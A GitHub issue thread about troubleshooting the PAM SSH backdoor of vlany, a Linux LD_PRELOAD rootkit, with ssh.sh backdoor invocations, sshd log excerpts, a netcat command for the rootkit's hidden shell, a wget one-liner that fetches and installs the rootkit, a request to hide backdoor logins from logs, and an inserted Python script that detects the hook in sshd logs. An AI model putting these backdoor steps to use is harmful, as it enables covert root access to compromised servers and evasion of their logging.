mempodippy / vlany

Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)
GNU General Public License v3.0

Unable to authenticate using the PAM backdoor on CentOS 6.x #13

Open bogdanstoica35 opened 7 years ago

bogdanstoica35 commented 7 years ago

I have successfully installed vlany on a clean centos box (a kvm vps), centos 6.8 x64 distro with the latest updates (the minimal install). Nothing else is running on that vps since it was specifically created to test your rootkit.

I am using sh ssh.sh username localhost port (it connects to the sshd daemon to the backdoor ssh port specified during rootkit install). But the user/pass combination always fails.

Any help would be really appreciated!

Keep developing this really nice rootkit!

unixfox commented 7 years ago

Already reported here: https://github.com/mempodippy/vlany/issues/5#issuecomment-261387093

mempodippy commented 7 years ago

Apologies. Will look at version changes more in-depth tomorrow. Only went on small assumptions. :/ unixfox, the issue still stands... I do have a solution to fix the problem, but there is a better solution than an easy fix which I would rather choose over the prior option. I'll see what happens... Will resolve this small mistake on my behalf tomorrow.

bogdanstoica35 commented 7 years ago

Thank you. Is there another method to remotely connect to a server where the rk was installed except for the ssh? I mean like connecting from my linux box to the server? Also when using the ssh backdoor port are there any logs saved?

bogdanstoica35 commented 7 years ago

Btw until the ssh/pam backdoor is fixed, how can I connect to the server where the rk was installed using netcat supposing low port is 10000 and high port is 10004 (that was configured during rk install)

Thanks again!

bogdanstoica35 commented 7 years ago

Not sure if you have changed anything in the rootkit but now the error changed (I have used the latest version from github on a new fresh centos 6 vps minimal install)

root@pve1:/opt# ./ssh.sh bogdan 172.16.100.50 8197
Connecting to PAM backdoor @ host 172.16.100.50 on hidden PAM port 8197 as sweed29
Press enter to continue
sweed29@172.16.100.50's password:
sweed29@172.16.100.50's password:
Failed to connect. bind probably still alive - wait a minute and try again.

I thought it is good to share this information with you.

PS: How do I connect using netcat to get a shell?

mempodippy commented 7 years ago

The bug might actually be fixed. I ran into this bug a couple of times using ssh.sh to connect, but could connect without it, suggesting ssh.sh is the perpetrator in this situation.. I'd always fix it locally and forget to update it on the repo. Pull the latest commit and try again.

If you can install a web server (shouldn't be done in a real situation if there's not already one installed) and use the snodew backdoor, it will give you a reverse root shell assuming suid bins aren't disabled on the box. The accept backdoor doesn't work in most situations. Since the accept backdoor is somewhat deprecated, I'd like to only work on the accept backdoor if it's absolutely vital - but in time I probably will make updates and improvements to it. nc -p [source_port] [host] [service port] Of course, add the --ssl flag if you installed the backdoor to go through SSL.

Edit: I'm working on my own local version, and I'm making significant changes to it. Said changes are mostly optimisation, couple of changes to hooks and functions, may just resolve and improve the accept backdoor while I'm doing that.

bogdanstoica35 commented 7 years ago

root@pve1:/opt# sh ssh.sh sweed29 172.16.100.51 8197
Connecting to PAM backdoor @ host 172.16.100.51 on hidden PAM port 8197 as sweed29
Press enter to continuessh.sh: 15: read: arg count
root@pve1:/opt# sweed29@172.16.100.51's password:
Permission denied, please try again.
sweed29@172.16.100.51's password:
Permission denied, please try again.
sweed29@172.16.100.51's password:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

For some reason now it tries to login using the private key. I have checked and I have no private key generated for that user on my local box and user sweed29 does not actually exist on the remote box (where the rootkit is installed).

I have managed to connect using the nc -p 10000 host 22 (there is no web server installed) but that shell seems to be limited to just a few commands. So I really think that a working ssh backdoor is the way to go.

Thank you for all your efforts. Maybe I am not doing something right but it's still not working.

I have spun up a new clean centos 6.8 minimal install vm and got the source from git, and installed it (I have destroyed the previous vm).

unixfox commented 7 years ago

@bogdanstoica35 It isn't trying to authenticate using a private key, the listing at the end (Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password)) is just the authentication methods available for your openssh server.

@mempodippy Did you try to install vlany on CentOS 5.11? It doesn't want to install because of this error:

Traceback (most recent call last):
  File "config.py", line 11, in ?
    print "Usage: {0} <install> <lib name> <xattr 1> <xattr 2> <username> <plaintext password> <pam port> <ssl backdoor status> <accept shell password> <low> <high> <execve password> <environ var> <ptrace bug status>".format(sys.argv[0])
AttributeError: 'str' object has no attribute 'format'
Configuration failed. Exiting.

I think it's because the python version of CentOS 5 is a bit old (Python 2.4.3 (#1, Jan 9 2013, 06:47:03)) and str.format is available since python 2.6 (http://stackoverflow.com/a/792745/4297304).

mempodippy commented 7 years ago

That's annoying... Will update a fix to that problem soon.

unixfox commented 7 years ago

@mempodippy I fixed the issue (https://github.com/mempodippy/vlany/pull/14), I'm currently testing if vlany is working fine on CentOS 5.11.

unixfox commented 7 years ago

It fails on Configuration failed. Exiting. without additional errors, really strange... I think it gets stuck with the config.py program. PS: I'm using the config.py with my fix.

mempodippy commented 7 years ago

config.py uses str.format very frequently, especially when setting up const.h. It'll take about 5-10 minutes to replace the uses of str.format with the older compatible method of formatting strings, it just looks nasty lol.. unixfox, give me a second, check email. :smile:

unixfox commented 7 years ago

@mempodippy There are so many lol, I'll try to convert them tomorrow (it's 1am UTC+1 for me) because it fails too with a quick try (https://github.com/mempodippy/vlany/pull/14/commits/5a7d3009b0a167567d9cb354348e4a0fee866f82).

mempodippy commented 7 years ago

Appreciated, and it's quite late here too. Will be up later so I'll probably catch up on small changes and work on my local version a bit.

bogdanstoica35 commented 7 years ago

Yeah well, in the end it is still not working on centos 6. Can authenticate via the ssh backdoor! I will try on a fresh centos install, re-install vlany and see if it works or not. I'll keep you posted!

bogdanstoica35 commented 7 years ago

After a new fresh install, this is the result:

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534
Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29
Press enter to continue
sweed29@172.16.100.54's password:
Failed to connect. bind probably still alive - wait a minute and try again.
root@pve1:/opt#

The previous errors are gone. Am I doing something wrong?!

PS: Is it an issue that the centos vm is an lxc container in fact? I can spin a kvm vm if necessary...

bogdanstoica35 commented 7 years ago

On the vm where the rootkit is installed:

Jan 15 04:40:54 centos sshd[1226]: Server listening on 0.0.0.0 port 22.
Jan 15 04:42:51 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:42:54 centos sshd[1237]: error: fcntl(5, F_GETFL, 0): Bad file descriptor
Jan 15 04:43:38 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:43:39 centos sshd[1242]: error: fcntl(6, F_GETFL, 0): Bad file descriptor
Jan 15 04:44:45 centos sshd[1246]: Invalid user sweed29 from 172.16.100.1
Jan 15 04:44:45 centos sshd[1247]: input_userauth_request: invalid user sweed29
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.16.100.1
Jan 15 04:44:50 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2
Jan 15 04:44:53 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:55 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2

On the server where ssh.sh is and after waiting for about 2-3 minutes

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534
Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29
Press enter to continue
sweed29@172.16.100.54's password:
sweed29@172.16.100.54's password:
sweed29@172.16.100.54's password:
Failed to connect. bind probably still alive - wait a minute and try again.

Wasn't it supposed to hide the connections on the backdoor? Like not showing the login in the logs?!
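The sshd excerpt in this report is a useful defender-side illustration of what a hooked sshd still leaves behind: the `accept: Software caused connection abort` and `fcntl(...): Bad file descriptor` errors that appear while the hook sits in sshd's accept path, the `Invalid user` and `Failed password` lines for an account that does not exist in the password database, and the fact that the client source port of those failed attempts (65534) matches the port number passed to `ssh.sh`. The script below is an added example, not part of this thread or of the vlany project. It parses the log lines quoted above (embedded verbatim, one per line) and reports exactly those three observations; the `known_users` set is an assumption standing in for a real lookup of local accounts.

```python
import re
from collections import Counter, defaultdict

# The sshd lines quoted in the report above, one per line (copied from the thread, not constructed).
SAMPLE_LOG = """\
Jan 15 04:40:54 centos sshd[1226]: Server listening on 0.0.0.0 port 22.
Jan 15 04:42:51 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:42:54 centos sshd[1237]: error: fcntl(5, F_GETFL, 0): Bad file descriptor
Jan 15 04:43:38 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:43:39 centos sshd[1242]: error: fcntl(6, F_GETFL, 0): Bad file descriptor
Jan 15 04:44:45 centos sshd[1246]: Invalid user sweed29 from 172.16.100.1
Jan 15 04:44:45 centos sshd[1247]: input_userauth_request: invalid user sweed29
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.16.100.1
Jan 15 04:44:50 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2
Jan 15 04:44:53 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:55 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2
"""

# Classic syslog prefix: "Mon DD HH:MM:SS host sshd[pid]: message"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$")
FAILED_RE = re.compile(
    r"^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
INVALID_RE = re.compile(r"^Invalid user (?P<user>\S+) from (?P<ip>\S+)")
# Errors from sshd's accept()/fcntl() path; on an unmodified sshd these are rare.
ACCEPT_ERR_RE = re.compile(r"^error: (?:accept:|fcntl\()")


def parse_sshd(text):
    """Return a list of {ts, host, pid, msg} dicts for every sshd line in text."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def analyse(text):
    """Aggregate the signals we care about from the parsed sshd lines."""
    failed = Counter()                 # (user, ip) -> number of failed password attempts
    invalid_users = set()              # users sshd itself reported as non-existent
    source_ports = defaultdict(set)    # ip -> client source ports seen on failed attempts
    accept_errors = []                 # (ts, pid, msg) for accept/fcntl errors
    for ev in parse_sshd(text):
        msg = ev["msg"]
        m = FAILED_RE.match(msg)
        if m:
            failed[(m.group("user"), m.group("ip"))] += 1
            source_ports[m.group("ip")].add(int(m.group("port")))
            continue
        m = INVALID_RE.match(msg)
        if m:
            invalid_users.add(m.group("user"))
            continue
        if ACCEPT_ERR_RE.match(msg):
            accept_errors.append((ev["ts"], ev["pid"], msg))
    return {"failed": failed, "invalid_users": invalid_users,
            "source_ports": source_ports, "accept_errors": accept_errors}


def findings(text, known_users=frozenset()):
    """Human-readable findings. known_users is an assumed stand-in for a lookup of local accounts."""
    r = analyse(text)
    out = []
    for (user, ip), n in sorted(r["failed"].items()):
        if user in known_users and user not in r["invalid_users"]:
            continue  # ordinary failed login for a real account; not what we are hunting here
        ports = ", ".join(str(p) for p in sorted(r["source_ports"][ip]))
        out.append(f"{n} failed password attempts for unknown user {user} from {ip} "
                   f"(client source ports: {ports})")
    if r["accept_errors"]:
        first, last = r["accept_errors"][0][0], r["accept_errors"][-1][0]
        pids = ", ".join(sorted({pid for _, pid, _ in r["accept_errors"]}))
        out.append(f"{len(r['accept_errors'])} sshd accept/fcntl errors between "
                   f"{first} and {last} (pids {pids}); review sshd's loaded libraries")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE_LOG, known_users={"root"}):
        print(line)
```

The point of keeping the client source port is the correlation visible in the thread: the `port 65534` on the `Failed password` lines is the same number handed to `ssh.sh`, so failed attempts reveal the configured port even though unixfox notes that successful logins are hidden. The accept/fcntl finding is deliberately phrased as something to review rather than as proof of anything; the same errors can have mundane causes, and the thread only shows them alongside a hook that was not working.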

unixfox commented 7 years ago

The failed connections are logged because it's by default in the openssh server. Only successful connections are hidden from the logs. I'll try on a fresh CentOS 6 (KVM) install if I can reproduce the bug.

EDIT: There is a bug at install, caused by my commit (https://github.com/mempodippy/vlany/pull/14); you can temporarily use an old version of vlany (this was WIP, work in progress, but @mempodippy merged the commits):

wget https://github.com/mempodippy/vlany/archive/6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c.zip -O vlany.zip && unzip vlany.zip && cd vlany-6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c && ./install.sh

EDIT²: I can reproduce the bug reported by @bogdanstoica35.

bogdanstoica35 commented 7 years ago

So it is not related to an lxc container, the behavior is the same on both lxc vm and kvm vm.

bogdanstoica35 commented 7 years ago

Any updates on this?!

unixfox commented 7 years ago

I'll resolve my issue when I'll have some time because currently I'm busy. For the PAM backdoor bug, @mempodippy will take a look at it when he'll have free time I think.

mempodippy commented 7 years ago

Sorry, I've been very busy. In the next few days or so I'm going to push a significant update. While doing so I'll attempt to fix the PAM backdoor bug. If a fix isn't pushed in the same commit, then it'll be pushed after. Apologies. Edit: Expect a push whenever. Been busy the past couple of weeks with some school stuff... It'll only get worse too.

bogdanstoica35 commented 7 years ago

I am still unable to login via ssh using the backdoor username. I can login with a real regular user or root account though. Is there any way that the connections to ssh using the backdoor port are not logged at all? I mean the way I see it, that's the purpose of a rootkit right? To be able to connect to a server without anyone being able to see you connected or any trace appearing in the server's logs...

unixfox commented 7 years ago

@mempodippy hasn't pushed in a long time so it's normal that the bug isn't resolved. And for hiding failed attempts to the backdoor it's possible by removing all logs from the special user used for ssh but this isn't really useful because if the login is successful the log will already be removed. PS: I just wanted to remind you that vlany is I think a research project & in active development and not fully designed to be installed on a compromised critical machine.

mempodippy commented 7 years ago

There's a disclaimer in the README. Refer to that.

bogdanstoica35 commented 7 years ago

I am pretty aware of what vlany is and I have also read the Readme file. I thought that testing or suggesting features or any other stuff like this would be helpful for the improvement or the development of vlany. Nothing else!

mempodippy commented 7 years ago

It is helpful, thank you. I just need to make myself some time.

bogdanstoica35 commented 7 years ago

Any news?

mempodippy commented 7 years ago

I'm moving, will have more time after that. However my current local version has new function additions & optimization, owner shell tweaking, some changes to the library constructor & destructor, changes to hooks & config, and some other minor things. But... it is very unstable. Everything has been thrown in without compiling the new changes, so once I'm satisfied with all the changes, I'll see what needs fixed. Would rather keep this slightly managed version of vlany on the repository. I will push an update soon. Sorry.